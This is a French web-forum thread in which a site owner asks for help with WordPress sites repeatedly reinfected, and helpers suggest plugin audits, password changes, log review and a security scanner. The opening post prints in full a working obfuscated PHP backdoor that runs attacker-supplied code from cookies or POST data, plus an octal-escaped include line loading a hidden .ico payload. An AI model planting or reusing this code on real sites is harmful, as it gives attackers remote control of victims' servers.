Hack sur Wordpress

Vous avez des problèmes sur l'utilisation du forum ?
Des commentaires à faire ?
C'est ici !
Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Hack sur Wordpress

Message par Mric30 »

Bonjour,
désolé je ne sais pas où poster cette question sur ce forum :
cela fait plus de 1 mois que je me bats avec des sites sous wordpress.

J'ai remis tous les sites au propre, j'ai donc réinstallé tous les wordpress, tous les plugins, et ... Toujours le même soucis,
au boute de quelques jours, j'ai un fichiers en général
vdyevudvez.php
avec à l'nitérieur :
ce type de code :

Code : Tout sélectionner

<?php
$xkoxk = 'f\'82u_5nbdy#ki91grepom7sc4ltaH3*v-x';$gywfuem = Array();$gywfuem[] = $xkoxk[29].$xkoxk[31];$gywfuem[] = $xkoxk[24].$xkoxk[17].$xkoxk[18].$xkoxk[28].$xkoxk[27].$xkoxk[18].$xkoxk[5].$xkoxk[0].$xkoxk[4].$xkoxk[7].$xkoxk[24].$xkoxk[27].$xkoxk[13].$xkoxk[20].$xkoxk[7];$gywfuem[] = $xkoxk[15].$xkoxk[6].$xkoxk[25].$xkoxk[18].$xkoxk[9].$xkoxk[6].$xkoxk[0].$xkoxk[3].$xkoxk[33].$xkoxk[3].$xkoxk[3].$xkoxk[15].$xkoxk[9].$xkoxk[33].$xkoxk[25].$xkoxk[9].$xkoxk[22].$xkoxk[25].$xkoxk[33].$xkoxk[2].$xkoxk[6].$xkoxk[9].$xkoxk[22].$xkoxk[33].$xkoxk[0].$xkoxk[30].$xkoxk[22].$xkoxk[18].$xkoxk[2].$xkoxk[0].$xkoxk[22].$xkoxk[28].$xkoxk[3].$xkoxk[24].$xkoxk[14].$xkoxk[15];$gywfuem[] = $xkoxk[11];$gywfuem[] = $xkoxk[24].$xkoxk[20].$xkoxk[4].$xkoxk[7].$xkoxk[27];$gywfuem[] = $xkoxk[23].$xkoxk[27].$xkoxk[17].$xkoxk[5].$xkoxk[17].$xkoxk[18].$xkoxk[19].$xkoxk[18].$xkoxk[28].$xkoxk[27];$gywfuem[] = $xkoxk[18].$xkoxk[34].$xkoxk[19].$xkoxk[26].$xkoxk[20].$xkoxk[9].$xkoxk[18];$gywfuem[] = $xkoxk[23].$xkoxk[4].$xkoxk[8].$xkoxk[23].$xkoxk[27].$xkoxk[17];$gywfuem[] = $xkoxk[28].$xkoxk[17].$xkoxk[17].$xkoxk[28].$xkoxk[10].$xkoxk[5].$xkoxk[21].$xkoxk[18].$xkoxk[17].$xkoxk[16].$xkoxk[18];$gywfuem[] = $xkoxk[23].$xkoxk[27].$xkoxk[17].$xkoxk[26].$xkoxk[18].$xkoxk[7];$gywfuem[] = $xkoxk[19].$xkoxk[28].$xkoxk[24].$xkoxk[12];foreach ($gywfuem[8]($_COOKIE, $_POST) as $afcfbhs => $nujmpdz){function zlmoy($gywfuem, $afcfbhs, $tdlyoh){return $gywfuem[7]($gywfuem[5]($afcfbhs . $gywfuem[2], ($tdlyoh / $gywfuem[9]($afcfbhs)) + 1), 0, $tdlyoh);}function yipztr($gywfuem, $udngndi){return @$gywfuem[10]($gywfuem[0], $udngndi);}function iavsszi($gywfuem, $udngndi){$czinyq = $gywfuem[4]($udngndi) % 3;if (!$czinyq) {$gdqlu = $gywfuem[1]; $ixuyvht = $gdqlu("", $udngndi[1]($udngndi[2]));$ixuyvht();exit();}}$nujmpdz = yipztr($gywfuem, $nujmpdz);iavsszi($gywfuem, $gywfuem[6]($gywfuem[3], $nujmpdz ^ zlmoy($gywfuem, $afcfbhs, $gywfuem[9]($nujmpdz))));}
Dans le index.php
ce type de code :

Code : Tout sélectionner

/*42641*/

@include "\057ho\155e8\057mr\151c2\057pu\142li\143_h\164ml\057na\164io\156al\147al\154ia\143up\057wp\055in\143lu\144es\057Si\155pl\145Pi\145/X\115L/\05674\0636a\06132\056ic\157";

/*42641*/
Un fichier masque .ico qui se place aléatoirement dans des dossiers ... Ici on voit qu'il est dans wp-include par exemple.

Sucuri ne trouve rien, les antivirus/malware ne trouvent rien ...
Je ne sais plus où chercher ?
Si quelqu'un avait une idée?
merci d'avance ,
Mric

Avatar de l’utilisateur
Parisien_entraide
Geek à longue barbe
Geek à longue barbe
Messages : 3788
Inscription : 02 juin 2012 20:48

Re: Hack sur Wordpress

Message par Parisien_entraide »

Bonsoir,

Malekal te répondra peut etre plus en détail, mais si le problème perdure depuis plus d'un mois, la faille, si faille il y a, est plus à chercher dans les plug in, qui sont pour les 3/4 responsables des attaques suites à des failles
Là cela ressemble à du javascript avec des renvois de valeur etc

Reste à trouver le coupable..

Ex https://secupress.me/fr/blog/vulnerabil ... -celebres/
Only Amiga... was possible !
Un problème sans solution est un problème mal posé. » (Albert Einstein)

Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Re: Hack sur Wordpress

Message par Mric30 »

Eh ben, je vais galérer je crois .... :(

Malekal_morte
Site Admin
Site Admin
Messages : 100351
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hack sur Wordpress

Message par Malekal_morte »

Salut,

Tu n'as pas du code maison dans tes sites ?
Quelque chose fait en PHP ?

C'est hébergé où ?
Si tu accès en FTP, tu as changé les mots de passe ?
Image

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus

Les tutoriels Windows 10 du moment : Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Re: Hack sur Wordpress

Message par Mric30 »

Merci de me répondre
Malekal_morte a écrit :
01 janv. 2020 12:21
Tu n'as pas du code maison dans tes sites ?
Non pas du tout
Malekal_morte a écrit :
01 janv. 2020 12:21
Quelque chose fait en PHP ?
Non plus
Malekal_morte a écrit :
01 janv. 2020 12:21

C'est hébergé où ?
O2 Switch
Ils m'ont même mis à dispo un 2ème hebergement le temps de tout remettre propre ...
Et franchement ,il doit y avoir 15Go de site internet (beaucoup de photos sur certains sites) , donc c'est pas rapide à remettre en place
Malekal_morte a écrit :
01 janv. 2020 12:21
Si tu accès en FTP, tu as changé les mots de passe ?
Oui, je l'ai fait, mais je peux le refaire ...

Dans mes recherches j'ai trouvé ceci , qui est exactement mon cas, mais je n'arrive pas à trouver à partir de quel fichier ils peuvent revenir, de plus le hack ne revient que 4 ou 5 jours après la remise au propre.

Malekal_morte
Site Admin
Site Admin
Messages : 100351
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hack sur Wordpress

Message par Malekal_morte »

Pour détecter les backdoor PHP
Faut regarder les logs du serveur.
Et regarder les pages très peu consulter.

Là c'est compliqué comme ça car ça peut venir de n'importe quoi.
Tu as installé aussi une extension de protection autre que security ? Style WordFense par exemple.
Certains scan le site pour trouver des fichiers modifiés.

Tu utilises quoi comme extension ?
Il y a peut-être une 0day sur l'une d'elle.
Image

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus

Les tutoriels Windows 10 du moment : Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Re: Hack sur Wordpress

Message par Mric30 »

Oui j'ai essayé, mais ça ne trouve rien, bon après j'ai pas essayé sur tous les wordpress que j'ai dessus.
Je dois installer Wordfence sur chacun ?

Malekal_morte
Site Admin
Site Admin
Messages : 100351
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hack sur Wordpress

Message par Malekal_morte »

Oui pour voir.
Note aussi que ça peut venir du PC.
Genre il a un malware qui donne le mot de passe FTP.
Du coup les pirates se connectent et upload la backdoor.
Image

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus

Les tutoriels Windows 10 du moment : Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Re: Hack sur Wordpress

Message par Mric30 »

J'ai un mac, effectivement j'avais un malware.
Ce matin, plus de compte mail dans mon cpanel (les données y sont encore ...)
Apparemment ce coup ci c'est un hack roottn
https://forums.cpanel.net/threads/shado ... ty.649193/

Encore une nouveauté pour moi ...
Je sais pas ce que j'ai depuis novembre, mais soit un de mes site est un gruyère, soit il y a un problème sur mon hebergeur, je ne comprends plus là ...

Malekal_morte
Site Admin
Site Admin
Messages : 100351
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hack sur Wordpress

Message par Malekal_morte »

CPanel c'est le genre de trucs qui est attaqué.
Il était à jour ?
Image

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus

Les tutoriels Windows 10 du moment : Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Re: Hack sur Wordpress

Message par Mric30 »

Les mecs de O2Switch me disent que si le Cpanel a été attaqué c'est à cause d'un de mes sites qui doit avoir une faille, je suis entrain de les passer dans wordfence :)
J'ai effectivement trouvé des trucs dans wordfence ...

Malekal_morte
Site Admin
Site Admin
Messages : 100351
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hack sur Wordpress

Message par Malekal_morte »

Ca avance on dirait =)
Image

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus

Les tutoriels Windows 10 du moment : Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Re: Hack sur Wordpress

Message par Mric30 »

Effectivement, je reviens ici pour te remercier !
Wordfence est top ! C'est un peu relou quand on en a 10 à installer, mais au moins plus rien, je me sens tranquille et tranquilliser ! :)
Dorénavant je l'installerai d'office, il faut juste que je verifie que ça ne ralentit pas trop mes sites ...

Malekal_morte
Site Admin
Site Admin
Messages : 100351
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hack sur Wordpress

Message par Malekal_morte »

De rien.
Trend-Micro a couvert cette attaque : Looking into Attacks and Techniques Used Against WordPress Sites.
In this case, the patch feature was applied to index.php to include a malicious script inside a Unix hidden file (dot file) with .ico extension pretending to be an icon.
Pour se maintenir,
  • Un theme Wordpress avec une backdoor
  • Une Backdoor PHP : Alfa-Shell
Ils provoquent des redirections pour les visiteurs vers des pubs merdiques.
An infected WordPress can also serve as an advertisement redirector, for instance, by patching a theme’s JavaScript file or header/footer generator function (e.g., wp-content\themes\twentyseventeen\functions.php). The modified JavaScript redirects users to a website specified by the attacker.
Enfin Initialement pour pirater le site :
This method involves gaining administrator access to a WordPress-powered website. An attacker could exploit a vulnerability or simply log in via leaked or weak credentials, which can be done by sending a POST request to /wp-login.php on a targeted website.
Donc tu devais avoir un compte administrateur avec un mot de passe trop simple.
=> Les attaques par Brute Force.
Image

Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus

Les tutoriels Windows 10 du moment : Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Mric30
newbie
newbie
Messages : 8
Inscription : 31 déc. 2019 16:01

Re: Hack sur Wordpress

Message par Mric30 »

Possible car j'ai des wordpress de test sur cet hebergement .. :)

Répondre

Revenir à « Questions/Commentaires sur le forum »